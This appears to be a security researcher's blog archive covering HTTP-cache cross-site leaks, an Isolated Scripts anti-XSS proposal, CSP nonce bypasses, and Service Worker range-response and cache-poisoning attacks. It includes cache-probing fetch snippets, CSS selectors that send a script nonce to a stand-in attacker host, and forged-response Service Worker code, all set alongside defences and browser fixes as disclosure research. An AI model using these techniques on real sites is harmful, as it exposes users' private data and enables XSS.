
Tuesday, March 19, 2019

[🌐💧💥] HTTP Cache Cross-Site Leaks

In this blog post I want to talk about a cool type of attack (XSLeaks) that is more powerful than most developers and security researchers might realize.

Almost 10 years ago, Chris Evans described an attack against Yahoo! Mail in which a malicious website could search the email inbox of a visitor and learn whether the search returned results or not. This essentially could have allowed him to search the user's emails word by word, and learn a lot about the emails the user received, from whom, and when.

Chris did that by simply checking how long the server took to respond to a search query (done through the victim's browser, so it included cookies), and he concluded that if it took longer to return, it must have been because the search query had results, and if it returned faster, it probably had no results.

"the server has at least a 40ms difference in minimum latency between a query for a word not in the index, and a query for a word in the index"
The attack was cool, but since it was based on network timing, it was a bit hard to pull off. Six years later, Nethanel Gelernter and Amir Herzberg went a bit deeper into this attack, named it XS-Search, and used statistics to make it more reliable. In the years that followed, the attacks steadily improved, going beyond timing to browser "misfeatures" and bugs that made them a lot more stable, up to near-perfection. In other words, detecting whether a search query has results is now almost trivial to accomplish through a variety of tricks.

Today I want to bring attention to one of those tricks: a very reliable mechanism to query the HTTP cache in all browsers (with caveats). As far as I know, previous attacks in this area relied on timing (cached resources load faster than non-cached resources), and were mostly used for figuring out the victim's browser history, geographic location, or for fingerprinting.

While those attacks were interesting, consider this variation:
  1. Delete the cache for a specific resource (or list of resources).
  2. Force the browser to render a website (navigation, or prerender).
  3. Check if the browser cached the resource deleted at (1).
What this variation gives you is the ability to figure out whether a website loads a specific resource (image, script, stylesheet, etc) or not. In other words, you can just ask the browser a question like:
When the user opens this website: https://www.facebook.com/me/friends will the profile picture of Chris Evans be requested? Or, in other words, am I friends with Chris Evans on Facebook?
Fortunately, Facebook seems to sign their URLs, so you probably can't do this attack so simply, but how about this instead?
When the user opens this website: https://www.facebook.com/groups/bugbountygroup/about will this script https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/xxx.js be requested? Or in other words, do I have access to the Facebook bugbounty group?
This other attack is more broadly interesting: as long as there is a resource that loads if the user has access but doesn't load if the user doesn't, you can figure out whether a user has access to something or not.

Again, fortunately Facebook actually preloads all scripts and images regardless of whether the user has access to private groups or not.

Now, the same technique applies to search results! You can query the browser and ask:
When the user opens this website: https://www.facebook.com/messages/?qa=indonesia will this script be requested? Or in other words, has the user talked about visiting Indonesia?
Again, fortunately Facebook actually doesn't issue search queries on messages and requires the user to "confirm" the search query :-).


As you can see, some websites have deployed protections against Cross-Site Leaks in the past year, some more effective than others. I think this is one of those few attacks that only large websites try to protect against, while most of the internet remains vulnerable.

So, now that I've described the attack, here's how to do it! The summary of the trick is that it allows you to do two things:
  1. Delete the HTTP Cache for a specific resource or URL
  2. Query the HTTP Cache to see if the browser cached it
To delete the HTTP Cache, you just have to either issue a POST request to the resource, or use the fetch API with cache: "reload" in a way that returns an error on the server (eg, by setting an overlong HTTP referrer), which will lead to the browser not caching the response, and invalidating the previous cached response.
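As a rough sketch (the helper name and the referrer length are made up, and this assumes the target server fails hard on an overlong Referer, as described above), the eviction step could look like this:

// Evict a cached resource: cache 'reload' bypasses the cache and
// overwrites the entry, and the overlong referrer makes the server
// error out, so nothing cacheable replaces it.
function evictFromCache(url) {
  return fetch(url, {
    mode: 'no-cors',              // works on cross-origin resources
    cache: 'reload',              // bypass and invalidate the cache entry
    referrer: location.origin + '/' + 'x'.repeat(30000),
    referrerPolicy: 'unsafe-url', // send the full (overlong) URL as Referer
  }).catch(() => { /* a failed request is expected here */ });
}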

Then, after you navigate the user to the site you want to query (either through link rel=prerender, or by navigating another window or frame), you check whether the resource was cached. You can do that with the same overlong-referrer trick: if the resource was cached, it will load successfully, and if not, it'll fail. You can see an example of this attack here (that terjanq was nice enough to set up :-).
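Putting steps 2 and 3 together (again just a sketch, with an illustrative target URL and the same assumption about the server rejecting overlong referrers):

// Step 2: force the browser to render the target site, so that it
// fetches (and caches) the resource if the user has access.
const link = document.createElement('link');
link.rel = 'prerender';
link.href = 'https://www.facebook.com/groups/bugbountygroup/about';
document.head.appendChild(link);

// Step 3 (run after the prerender finishes): if the resource is now
// cached, this loads from cache and succeeds; otherwise it goes to the
// network with the overlong Referer and fails.
function isCached(url) {
  return fetch(url, {
    mode: 'no-cors',
    referrer: location.origin + '/' + 'x'.repeat(30000),
    referrerPolicy: 'unsafe-url',
  }).then(() => true, () => false);
}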

Here's a nicer explanation of the attack (with a happy cloud and everything):

Depending on who you are, you might be excited about this, depressed, angry, or ambivalent. Here are some suggestions on how to deal with it:
  1. If you are a website author, you might want to think about whether you have any of these leaks, and maybe try to protect against them (see defenses below).
  2. If you are a security researcher, you might want to check the websites you use to see if they are vulnerable (check caveats below).
  3. If you are a browser vendor, you might want to consider implementing double keyed cache (see caveats below).
You are probably wondering what these caveats are, so here we go:
  • The attack is "complicated" for Safari users, because Safari has something called "Verified Partitioned Cache", a technique for preventing user tracking that also accidentally helps here. It works by keying cache entries to their origin and to the site that loaded the resource. The attack is still possible (because the caching behavior is based on heuristics), but the details are probably worth a separate blog post.
  • Chrome will hopefully not be vulnerable for much longer, because it is experimenting with "Split Disk Cache", which works somewhat differently from Safari's but has the side effect of protecting against this attack. Note that this feature is currently behind a flag (--enable-features=SplitCacheByTopFrameOrigin), so test it out and send feedback to Chrome =).
  • Firefox users are vulnerable, but they can enable a preference to get similar behavior - "First Party Isolation", available as an add-on and as a pref (privacy.firstparty.isolate=true). It takes the approach Chrome is implementing a few steps further and splits not only the cache but several other things (such as permissions!), so test it out too, and send feedback to Firefox.
And if you are a web developer and are thinking about ways to defend against this, well, I have good news and bad news:
  • You can just disable HTTP cache. This has some bandwidth and performance consequences, though, so maybe don't do that.
  • You can add CSRF tokens to everything. This breaks all bookmarks that your users might have set, so maybe don't do that.
  • You can use SameSite=strict cookies to authenticate users (see the example header after this list). This is surprisingly well supported across browsers, and doesn't break bookmarks. Note, however, that there are some known bypasses (eg, if the site has some types of open redirects, as well as browser implementation bugs).
  • You can use COOP to slow down attackers (so every attack requires a click). Note, however, that it is only implemented in Firefox, and even there it's behind a pref (browser.tabs.remote.useCrossOriginOpenerPolicy), so test it out and send feedback to Firefox =).
  • You can do all the crazy things that Facebook apparently tries to do to protect against this! Or take a look at this page with some more ideas.
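For reference, the SameSite defense from the list above is a one-line change to the session cookie (sketch):

Set-Cookie: SID=XXXX; Secure; HttpOnly; SameSite=Strict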
🌐💧💥

I want to end this blog post by saying that the HTTP cache is not the only leak there is; there are a ton more! So protecting against the cache alone is not enough: you can also detect the length of the page, the JS execution cycles, the content-type, the number of TCP sockets, and many more. If you are a security researcher, please contribute! The XSLeaks wiki is a joint effort among several security researchers (terjanq, lbherrera_, ronmasas, _tsuro, arthursaftnes, kkotowicz, and me) trying to explore the limits of cross-site leaks, and hopefully by working together we can come up with better attacks :-). Contact me on twitter if you want to contribute (DMs are open).

Thanks for reading!

Wednesday, January 25, 2017

Fighting XSS with 🛡 Isolated Scripts

TL;DR: Here's a proposal for a new way to fight Cross-Site Scripting vulnerabilities called Isolated Scripts. There's an open-source prototype to play with the idea. Please let me know what you think!

Summary

In the aftermath of all the Christmas CSP bypasses, a discussion came up with @mikewest and @fgrx on the merits of using the Isolated Worlds concept (explained below) as a security mitigation against XSS. It seemed like an interesting problem, so I spent some time looking into it.

The design described below would allow you (a web developer) to defend some of your endpoints against XSS with just two simple steps:
  1. Set a new cookie flag (isolatedScript=true).
  2. Set a single HTTP header (Isolated-Script: true).
And that's it. With those two things you could defend your applications against XSS. It is similar to Suborigins but Isolated Scripts defends against XSS even within the same page!

And that's not all: another advantage is that it also mitigates third-party JavaScript code (such as Ads, Analytics, etcetera). Neat, isn't it?

Design

The design of Isolated Scripts consists of three components that work together:
  1. Isolated Worlds
  2. Isolated Cookies
  3. Secret HTML
I describe each one of them below and then show you the demo.

🌍 Isolated Worlds


Isolated Worlds is a concept most prominently used today in Chrome Extensions' content scripts and Greasemonkey scripts in Firefox - essentially, they allow JavaScript code to get a "view" of the document's DOM while running in an isolated JavaScript runtime. Let me explain:

Let's say that there is a website with the following code:
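<!-- minimal reconstruction of the example implied by the text below -->
<div id="text">Hello!</div>
<script>
  var variable = 42;
</script>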


The Isolated World will have access to document.getElementById("text"), but it will not have access to window.variable. That is, the only thing the two scripts share is an independent view of the HTML's DOM. This isolation is very important, because user scripts have elevated privileges: for example, they can trigger XMLHttpRequest requests to any website and read their responses.

If it wasn't for the Isolated World, then the page could do something like this to execute code in the user script, and attack the user:
document.getElementById = function() {
    arguments.callee.caller.constructor("attack()")();
};
In this way, the Isolated World allows us to defend our privileged execution context from the hostile user execution context. Now, the question is: Can we use the same design to protect trusted scripts from Cross-Site Scripting vulnerabilities?

That is, instead of focusing on preventing script execution as a mitigation (which we've found out to be somewhat error prone), why don't we instead focus on differentiating trusted scripts from untrusted scripts?

The idea of having privileged and unprivileged scripts running in the same DOM is not new; in fact, there are a few implementations out there (such as Mario Heiderich's IceShield, and Antoine Delignat-Lavaud's Defensive JS), but their implementations required rewriting code to overcome the hostile attacker. In Isolated Worlds, normal JavaScript code just works.

So, that is the idea behind Isolated Scripts - provide a mechanism for a web author to mark a specific script as trusted, which the browser will then run in an Isolated World.
An easy way to implement this in a demo is by reusing the Isolated Worlds implementation in Chrome Extensions, and simply installing a user script for every script served with the right response header.

🍪 Isolated Cookies


Now that we have a script running in a trusted execution context, we need a way for the web server to identify requests coming from it. This is needed because the server might only want to expose some sensitive data to Isolated Scripts.

The easiest way to do so would be simply adding a new HTTP request header similar to the Origin header (we could use Isolated-Script: foo.js for example). Another alternative is to create a new type of cookie that is only sent when the request comes from an Isolated Script. This alternative is superior to the HTTP header for two reasons:
  1. It is backwards compatible, browsers that don't implement it will just send the cookie as usual.
  2. It can work in conjunction with Same-site cookies (which mitigates CSRF as well).
To clarify, the web server would do this:
Set-Cookie: SID=XXXX; httpOnly; secure; SameSite=Strict; isolatedScript

And the browser will then process the cookie as usual, except that it will only include it in requests made by the Isolated Script. Browsers that don't understand the new flag will simply always include it.

An easy way to implement this in a demo is, instead of using flags, to use a special name in the cookie, and refuse to send the cookie except when the request comes from the isolated script.
One idea that Devdatta proposed was to make use of cookie prefixes, which could also protect the cookies from clobbering attacks.
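Combining that with the proposed flag could look something like this (a sketch; the isolatedScript flag is the proposal's, while the __Host- prefix is an existing mechanism):

Set-Cookie: __Host-SID=XXXX; Secure; Path=/; SameSite=Strict; isolatedScript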

🙈 Secret HTML


What we have now is a mechanism for a script to have extra privileges and be protected from hostile scripts by running in an isolated execution context. However, the script will of course want to display data to the user, and if it writes that data to the DOM, a malicious script would immediately be able to read it. So we need a way for the Isolated Script to write HTML that hostile scripts can't read.

While this primitive might sound new, it actually already exists today! It's already possible for JavaScript code to write HTML that is visible to the user, but unavailable to the DOM. There are at least two ways to do this:
  1. Creating an iframe and then navigating the iframe to a data:text/html URL (it doesn't work in Firefox because they treat data: URLs as same-origin).
  2. Creating an iframe with a sandbox attribute without the allow-same-origin flag (works in Chrome and Firefox).
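A minimal sketch of the second approach:

// HTML that is rendered on screen but unreachable from this page's DOM:
var frame = document.createElement('iframe');
frame.setAttribute('sandbox', '');  // no allow-same-origin: opaque origin
frame.srcdoc = '<b>secret</b>';
document.body.appendChild(frame);
// frame.contentDocument is null here: the content can't be read back.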
So, to recap, we can already create HTML nodes that are inaccessible to the parent page. What's left is making this easily backwards compatible, which breaks down into two problems:
  • CSS wouldn't be propagated down to the iframe, but to solve this problem we can propagate the calculated style down to the iframe's body, which will allow us to ensure that the text would look the same as if it was in the parent page (note, however that selectors wouldn't work inside it).
  • Events wouldn't propagate to the parent page, but to solve that problem we could just install a simple script that forwards all events from the iframe up to the parent document.
With this, the behavior would be fairly similar to normal HTML, but without providing a significant information leak to the hostile script.
An easy way to implement this in a demo is to create a setter function on innerHTML, and whenever the isolated script tries to set innerHTML, we instead create a sandboxed iframe with the content, to which we postMessage the CSS and the HTML, plus a message channel that can be used to propagate events up to the parent. To avoid confusing other code dependencies, we can create this iframe inside a closed Shadow DOM.
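A rough sketch of that setter (the helper is hypothetical, and the CSS/event forwarding described above is omitted for brevity):

function isolate(element) {
  var root = element.attachShadow({mode: 'closed'}); // hide the iframe
  Object.defineProperty(element, 'innerHTML', {
    set: function(html) {
      var frame = document.createElement('iframe');
      frame.setAttribute('sandbox', ''); // content gets an opaque origin
      frame.srcdoc = html;               // the "secret" HTML
      root.textContent = '';
      root.appendChild(frame);
    }
  });
}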
One potential concern with this design, which Malte brought up, is that depending on the implementation it could mess with developer experience, as some scripts most likely assume that content in the DOM is reachable (eg, via querySelector, getElementsByTagName, or otherwise). This is very important, and possibly the most valuable lesson to take away - rather than having security folks like me design APIs with weird restrictions, we should be asking authors what they need to do their work.

Demo

Alright! So now that I explained the concept and how it was implemented in the demo, it's time for you to see it in action.

First of all, to emulate the browser behavior you need to install a Chrome extension (don't worry, no scary permissions), and then just go to the "vulnerable website" and try to steal the contents of the XHR response! If you can steal them, you win a special Isolated Scripts 👕 T-Shirt, my eternal gratitude 🙏 (and, of course, 🎤 fame & glory).

So, let's do it!
  1. Install Chrome Extension
  2. Go to Proof of Concept website
There are XSS vulnerabilities everywhere on the page (both DOM-based and reflected), and I disabled the XSS filter to make your life easier. I would be super interested to learn about different ways to break this!

Note that there are probably implementation bugs that wouldn't be an issue in a real browser implementation, but please let me know about them anyway (either on twitter or in the comments below). While they don't negate the design, they are nevertheless something to keep in mind and fix, to make this as close to reality as possible.

In case you need it, the source code of the extension is here, and the changes required to disable CSP and enable Isolated Scripts instead are here.

🔍 Analysis

Now, I'm obviously biased here, since I already invested some time in this idea, but I think it's at least promising and has some potential. That said, I want to analyze its value and impact to avoid over-promising. I will use the framework for measuring web security mitigations that I described in my previous blog post (if you haven't read it, don't worry, I explain the relevant parts below).

Moderation

Moderation stands for: How much are we limiting the impact of the problem?

In this case, the impact is extremely easy to measure (modulo implementation flaws).
Any secret data protected with Isolated Cookies is only exposed to Isolated Scripts, and any data touched by Isolated Scripts is hidden from XSS. So the web author gets to decide the degree of moderation they require.
One interesting caveat to this that Mario brought up, is that conducting phishing attacks using XSS would still be possible, and is very likely to result in compromise with a tiny bit of social engineering.

Minimization

Minimization stands for: How much are we minimizing the number of problems?

We can also measure this. Most XSS - including content sniffing and plugin-based SOP bypasses (even some types of universal XSS bugs!) - can be mitigated by Isolated Scripts, but some types of DOM XSS can't.
The DOM XSS bugs that are not mitigated by Isolated Scripts are, for example, Angular template injections and eval()-based XSS - that is because they still inherit the capabilities of the Isolated Script.
I would love to hear of any other types of bugs that wouldn't be mitigated by Isolated Scripts.

Substitution

Substitution stands for: How much are we replacing risks with safer alternatives?

We can also quickly measure how much we are replacing the current risks with Isolated Scripts. Adoption seems very easy, although it has some problems:
  1. JavaScript code hosted in CDNs can't run in the Isolated World. This is working as intended, but also might limit the ease of deployment. One easy way to fix this is to use ES6 import statements.
  2. Code that expects to have access to "secret content" (like advertising, for example) won't be able to do so anymore and might fail in unexpected ways (note, however that in a browser implementation it might make sense to actually give access to the secret HTML to the Isolated script, if possible).
I would be super interested to hear any other problems you think developers might find in adoption.

Simplification

Simplification stands for: How much are we removing problems, rather than adding complexity?

Generally, we are adding complexity and removing complexity, and it's somewhat subjective to decide whether they cancel each other out or not.
  • On one hand, we are removing complexity by requiring all interactions with secret data to happen through a single funnel.
  • On the other hand, by adding yet another cookie flag, a new condition for script execution, and a new type of DOM isolation, we are making the web platform more difficult to understand.
I honestly think that we are making this a bit more complicated. Not as much as other mitigations, but slightly so. I would be interested to hear any arguments on how "bad" this complexity would be for the web platform.

Conclusion

Thank you so much for reading so far, and I hope you found reading this as interesting as I found writing it.

I think a good next step from here is to hear more feedback on the proposal (from authors, browsers, and hackers alike!), and perhaps identify ways we can simplify it further, ways to break it, and ways to make it more developer friendly.

If you have any ideas, please leave comments below or on twitter (or you can also email me).

Until next time 😸

Tuesday, December 27, 2016

How to bypass CSP nonces with DOM XSS 🎅

TL;DR - CSP nonces aren't as effective as they seem to be against DOM XSS. You can bypass them in several ways. We don't know how to fix them. Maybe we shouldn't.

Thank you for visiting. This blog post talks about CSP nonce bypasses. It starts with some context, continues with how to bypass CSP nonces in several situations and concludes with some commentary. As always, this blog post is my personal opinion on the subject, and I would love to hear yours.

My relationship with CSP, "it's complicated"

I used to like Content-Security-Policy. Circa 2009, I was really excited about it. Excited enough that I even spent a bunch of time implementing CSP in JavaScript in my ACS project (to my knowledge, the first working CSP implementation/prototype). It supported hashes and whitelists, and I was honestly convinced it was going to be awesome! My abstract started with "How to solve XSS [...]".

But one day one of my friends from elhacker.net (WHK) pointed out that ACS (and CSP by extension) could be trivially circumvented using JSONP. He pointed out that if you whitelist a hostname that contains a JSONP endpoint, you are busted - and there were so many of them that I didn't see an easy way to fix this. My heart was broken. 💔

Fast-forward to 2015, when Mario Heiderich made a cool XSS challenge called "Sh*t, it's CSP!", where the challenge was to escape an apparently safe CSP with the shortest payload possible. Unsurprisingly, JSONP made an appearance (but also Angular and Flash). Talk about beating a dead horse.

And then finally in 2016, a reasonably popular paper called "CSP Is Dead, Long Live CSP!" came out, summarizing the problems highlighted by WHK and Mario after an internet-wide survey of CSP deployments performed by Miki, Lukas, Sebastian and Artur. The conclusion of the paper was that CSP whitelists were completely broken and useless. At least CSP got a funeral, I thought.

However, that was not the end. The paper, in turn, advocated for the use of CSP nonces instead of whitelists. A bright future for the new way to do CSP!

When CSP nonces were first proposed, my concern was that their propagation seemed really difficult. To solve this problem, dominatrixss-csp back in 2012 made it so that all dynamically generated script nodes would work, by propagating the script nonces with its dynamic resource filter. This made nonce propagation really simple. This exact approach was proposed in the paper and named strict-dynamic, now with user-agent support rather than as a runtime script like dominatrixss-csp. A great improvement. We got ourselves a native dominatrixss!

This new flavor of CSP proposed to ignore whitelists completely and rely solely on nonces. While deploying CSP nonces is harder than whitelists (it requires server-side changes on every single page with the policy), it nevertheless seemed to offer real security benefits, which were clearly lacking in the whitelist-based approach. So yet again, this autumn, I was reasonably optimistic about this new approach. Perhaps there was a way to make most XSS actually *really* unexploitable this time. Maybe CSP wasn't a sham after all!

But this Christmas, as if it were a piece of coal from Santa, Sebastian Lekies pointed out what, in my opinion, is a significant blow to CSP nonces, almost completely making CSP ineffective against many of the XSS vulnerabilities of 2016.

A CSS+CSP+DOM XSS three-way

While CSP nonces indeed seem resilient against 15-year-old XSS vulnerabilities, they don't seem to be so effective against DOM XSS. To explain why, I need to show you how web applications are written nowadays, and how that differs from 2002.

Before, most of the application logic lived on the server, but in the past decade it has been moving more and more to the client. Nowadays, the most effective way to develop a web application is by writing most of the UI code in HTML+JavaScript. This, among other things, makes web applications offline-ready, and provides access to an endless supply of powerful web APIs.

Newly developed applications still have XSS; the difference is that since a lot of the code is written in JavaScript, they now have DOM XSS. And these are precisely the types of bugs that CSP nonces can't consistently defend against (as currently implemented, at least).

Let me give you three examples (a non-exhaustive list, of course) of common DOM XSS bugs that CSP nonces alone can't defend against:
  1. Persistent DOM XSS, where the attacker can force navigation to the vulnerable page and the payload is not included in the cached response (so it needs to be fetched).
  2. DOM XSS bugs where pages include third-party HTML code (eg, fetch(location.pathName).then(r=>r.text()).then(t=>body.innerHTML=t);)
  3. DOM XSS bugs where the XSS payload is in the location.hash (eg, https://victim/xss#!foo?payload=).
To explain why, we need to travel back in time to 2008 (woooosh!). Back in 2008, Gareth Heyes, David Lindsay and I gave a small presentation at Microsoft BlueHat called CSS - The Sexy Assassin. Among other things, we demonstrated a technique to read HTML attributes purely with CSS3 selectors (which was coincidentally rediscovered by WiSec and presented with kuza55 in their 25c3 talk Attacking Rich Internet Applications a few months later).

The summary of this attack is that it's possible to create a CSS program that exfiltrates the values of HTML attributes character by character, simply by generating an HTTP request every time a CSS selector matches, and repeating. If you haven't seen this working, take a look here. The way it works is very simple; it just creates CSS attribute selectors of the form:

*[attribute^="a"]{background:url("record?match=a")}
*[attribute^="b"]{background:url("record?match=b")}
*[attribute^="c"]{background:url("record?match=c")}
[...]

And then, once we get a match, repeat with:
*[attribute^="aa"]{background:url("record?match=aa")}
*[attribute^="ab"]{background:url("record?match=ab")}
*[attribute^="ac"]{background:url("record?match=ac")}
[...]

Until it exfiltrates the complete attribute.

The attack for script tags is very straightforward. We need to do the exact same attack, with the only caveat of making sure the script tag is set to display: block;.
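For instance, something along these lines (the attacker's URL is illustrative):

script { display: block; }
script[nonce^="a"] { background: url("//attacker.example/leak?prefix=a"); }
script[nonce^="b"] { background: url("//attacker.example/leak?prefix=b"); }
/* ... one rule per character, then repeat with the matched prefix ... */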

So, we can now extract a CSP nonce using CSS, and the only thing we need is the ability to inject multiple times into the same document. The three examples of DOM XSS I gave you above permit exactly that: a way to inject an XSS payload multiple times into the same document. The perfect three-way.

Proof of Concept

Alright! Let's do this =)

First of all, persistent DOM XSS. This one is particularly troubling, because if in "the new world" developers are supposed to write UIs in JavaScript, then the dynamic content needs to come from the server asynchronously.

What I mean is that if you write your UI code in HTML+JavaScript, then the user data must come from the server. While this design pattern lets you control how applications load progressively, it also means that loading the same document twice can return different data each time.

Now, of course, the question is: How do you force the document to load twice!? With HTTP cache, of course! That's exactly what Sebastian showed us this Christmas.

A happy @slekies wishing you happy CSP holidays! Ho! ho! ho! ho!
Sebastian explained how CSP nonces are incompatible with most caching mechanisms, and provided a simple proof of concept to demonstrate it. After some discussion on twitter, the consequences became quite clear. In a cool-scary-awkward-cool way.

Let me show you with an example. Let's take the default Guestbook example from the AppEngine getting started guide, with a few modifications that add AJAX support and CSP nonces. The application is simple enough, and it's vulnerable to an obvious XSS, but that's mitigated by CSP nonces - or is it?

The application above has a very simple persistent XSS. Just submit an XSS payload (eg, <H1>XSS</H1>) and you will see what I mean. But although there is an XSS there, you can't actually execute JavaScript because of the CSP nonce.

Now, let's do the attack. To recap, we will:

  1. Steal the CSP nonce with the CSS attribute reader.
  2. Inject the XSS payload using the stolen CSP nonce.

Stealing the CSP nonce will actually require some server-side code to keep track of the bruteforcing. You can find the code here, and you can run it by clicking the buttons above.

If all worked well, after clicking "Inject the XSS payload" you should have received an alert. Isn't that nice? =) In this case, the cache we are using is the BFCache, since it's the most reliable, but you could use traditional HTTP caching as Sebastian did in his PoC.

Other DOM XSS

Persistent DOM XSS isn't the only weakness of CSP nonces. Sebastian demonstrated the same issue with postMessage. Another problematic endpoint is XSS through HTTP "inclusion". This is a fairly common XSS vulnerability that simply consists of fetching some user-supplied URL and echoing it back in innerHTML - the JavaScript equivalent of Remote File Inclusion. The exploit is exactly the same as the others.

Finally, the last PoC of today is one for location.hash, which is also very common. Maybe because of IE quirks, many websites use the location hash to implement history and navigation in single-page JavaScript clients. It even has a nickname: "hashbang". In fact, this is so common that every single website that uses jQuery Mobile has this "feature" enabled by default, whether they like it or not.

Essentially, any website that uses the hashbang for internal navigation is as vulnerable to reflected XSS as if CSP nonces weren't there to begin with. How crazy is that! Take a look at the PoC here (Chrome only - Firefox escapes location.hash).

Conclusion

Wow, this was a long blog post.. but I hope you found it useful. Hopefully now you understand a bit better the real effectiveness of CSP, learned a few browser tricks, and got some ideas for future research.

Is CSP preventing any vulns? Yes, probably! I think all the bugs reported by GOBBLES in 2002 should be preventable with CSP nonces.

Is CSP a panacea? No, definitely not. Its coverage and effectiveness are even more fragile than we (or at least I) originally thought.

Where do we go from here?
  • We could try to lock CSP at runtime, as Devdatta proposed.
  • We could disallow CSS3 attribute selectors to read nonce attributes.
  • We could just give up with CSP. 💩
I don't think we should give up.. but I also can't stop wondering whether all this effort we spend on CSP could be better used elsewhere - especially since this mechanism is so fragile it runs the real risk of creating an illusion of security where none exists. And I don't think I'm alone in this assessment.. I guess time will tell.

Anyway, happy holidays, everyone! and thank you for reading. If you have any feedback, or comments please comment below or on Twitter!

Hasta luego!

Sunday, October 04, 2015

Range Responses: Mix, Match & Leak

Hey!

The videos from AppSec 2015 are now online, and the Service Workers talk is too. Anyway, this post is about another of the slides in the presentation, on Range Requests / Responses (more commonly known as Byte Serving) and Service Workers.

As things go, it turns out you can read content cross-domain with this attack, and this post explains how that works. Range Responses are essentially normal HTTP responses that only contain a subset of the body. It works like this:
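On the wire, a range exchange looks roughly like this (the URL is illustrative):

GET /video.ogg HTTP/1.1
Range: bytes=0-999

HTTP/1.1 206 Partial Content
Content-Range: bytes 0-999/5000
Content-Length: 1000

[...the first 1000 bytes of the video...]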

It's relatively straightforward! With service workers in the mix, you can do similar things:

And, I mean, what happens there is that the Service Worker intercepts the first request and gives you LoL instead of Foo. Note that this works cross-origin, since Service Workers apply to the page that created the request (so, say, if evil.com embeds a video from apple.com, the service worker from evil.com will be able to intercept the request to apple.com). One thing to note is that the Service Worker actually controls the total length of the response. What this means is that even if the actual response is 2MB, if the Service Worker says it's 100KB, the browser will believe the Service Worker (it seems browsers respect the first response size they see - in this case, the one from the service worker).

This all started when I noticed that you could split a response in two: one part generated by a Service Worker and one that isn't. To clarify, the code below intercepts a request to a song. What's interesting about it is that it actually serves part of the response from the Service Worker (the first 3 bytes).

Another interesting aspect is that the size of the file is truncated to 5,000 bytes. This is because the browser remembers the first provided length.

The code for this (before the bug was patched by Chrome) was:
  // Basic truncation example
  if (url.pathname == '/wikipedia/ru/c/c6/Glorious.ogg') {
    if (e.request.headers.get('range') == 'bytes=0-') {
      console.log('responding with fake response');
      e.respondWith(
        new Response(
          'Ogg', {status: 206, headers: {'content-range': 'bytes 0-3/5000'}}))
    } else {
      console.log('ignoring request');
    }
    return;
  }
So, to reiterate, the Service Worker is responding with "Ogg" as the first three bytes, and truncating the response to 5,000 bytes. Alright, so what can you do with this? Essentially, you can partially control audio/video responses, but it's unlikely this can cause a lot of problems, right? I mean, so what if you can make a bad song last 1 second rather than 30?

To exploit this we need to take a step back and see the data as the video decoder sees it. In essence, the video decoder doesn't actually know anything about range responses, it just sees a stream of bytes. Imagine if the video that the decoder sees had the following format:

  • [Bytes 0-100] Video Header
  • [Bytes 101-200] Video Frame
  • [Bytes 201-202] Checksum of Video Frame
Now imagine the video header and video frame (bytes 0-200) come from the Service Worker, and the checksum (bytes 201-202) comes from the target/victim site. A clever attacker could send 65 thousand different video frames until one of them doesn't error out, and would then know the value of bytes 201 and 202 of the target/victim site.

I searched for a while for a video format or container with this property, but unfortunately didn't find one. To be honest, I didn't look too hard, as these specs are really confusing to read; after about an hour of searching and scratching my head, I gave up and decided to do some fuzzing instead.

The fuzzing was essentially like this:
  1. Get a sample of video and audio files.
  2. Load them in audio/video tags.
  3. Listen to all events.
  4. Fetch the video from length 0-X, and claim a length of X+1.
  5. Have the last byte be 0xFF.
  6. Repeat
Whenever the fuzzer found a difference between the response for 0-X and 0-X+1, that meant there was an info leak! I ran this for a few hours, and after wasting my time looking at MP3 files (it seems they just give out approximate durations at random), I found a candidate. Turns out it wasn't a checksum - it was something even better! :)

So, I found that a specific encrypted WebM video errors out when truncated to 306 bytes if the last byte is greater than 0x29, but triggers an onencrypted event when it's less than that. This seems super weird, but it's a good start, I guess. I created a proof of concept that tests whether a given byte in a cross-origin resource is less than 0x29 or not. If you have a vulnerable browser (Chrome <=44) you can see the proof of concept here:
If you compare both pages you will see that one says PASS and the other says FAIL. The reason is that at position 306 of the robots.txt of www.bing.com there is a newline, while at position 306 of www.yahoo.com there is a letter.

Good enough you might think! I can now know whether position 306 is a space or not. Not really very serious, but serious enough to be cool, right? No. Of course not.

First of all, I wanted to make this apply to any offset, not just 306. It was easy enough to just create another EBML object of arbitrary size before it - you make the size longer or shorter, shifting the byte offset you are testing. First problem solved.

But still, the only thing I could learn is whether the character at that position is a space or not. So I started looking into why it errored out, and it turns out it was because the dimensions of the video were too big. There is a limit on the pixel size of a video, and the byte at position 306 happened to be part of the video's height, which was bigger than allowed.

So, well.. now that we know that, can we learn the exact value? What if we load the video 256 times, each time with a different width value, so that the size check overflows exactly when the byte is too big? The formula the video decoder was using for calculating the maximum dimensions is:


So! Seems easy enough then. I get the minimum value at which it errors out, and calculate its complement to INT_MAX/8 (minus 128), and that's the value of the byte at that position. Since this is a "less than" comparison, you can find this minimum value with a simple binary search.

And that's it. I made a slightly nicer exploit here, although the code is quite unreadable. The PoC will try to steal, byte by byte, the robots.txt of www.bing.com.

Severity-wise, fortunately, this isn't an end-of-the-world situation. Range Responses (or Byte Serving) don't actually work on any dynamically generated content I found online, most likely because dynamically generated content isn't static, so requesting it in chunks doesn't make sense.

And that's it for today! It's worth noting that this is possibly not specific to Service Workers, as HTTP redirects seem to have a similar effect (you make two requests to a same-origin video; the first time you respond with a truncated video, the second time you redirect to another domain).

Especially since Service Workers aren't as widely supported yet, feel free to write a PoC for that (you can use this for inspiration). And once the bug is public, you can follow along with the bug discovery here and the spec discussion here.

The bug is fixed in Chrome, but I didn't test other browsers as thoroughly for lack of time (and this blog post is already delayed like 3 months because of Chrome, so I didn't want to embargo it further). If you do find a way to exploit this elsewhere, please let me know the results; I'm happy to help if you get stuck.

Have a nice day!

Wednesday, May 27, 2015

[Service Workers] Secure Open Redirect becomes XSS Demo

This is the shortest delay between blog posts I've had in a while, but I figured that since my last post had some confusing stuff, it might make sense to add a short demo. The demo application has three things that enable the attack:

  1. An open redirect. Available at /cgi-bin/redirect?continue=.
  2. A Cache Service Worker. Available at /sw.js.
  3. A page that embeds images via <img crossorigin="anonymous" src="" />.
And the attacker's site has one thing:
  1. A CORS enabled attack page. Available at /cgi-bin/attack.
Let's do the attack then! For it to work we need two things to happen:
  • The service worker must be installed.
  • A request to our attack page must be cached with mode=cors.
Our index.html page will do both of those things for us.
Poison Cache

Image URL:



When you click submit above the following things will happen:
  1. A service worker will be installed for the whole origin.
  2. An image tag pointing to the open redirect will be created.
  3. The service worker will cache the request with the CORS response of the attacker.
If all went well, the page above should be "poisoned", and forever (or until the SW updates its cache) you will get the XSS payload. Try it! (Note that you must have first "poisoned" the response above; if you click the button below before poisoning the cache, you will ruin the demo forever, since an opaque response will get cached ;)
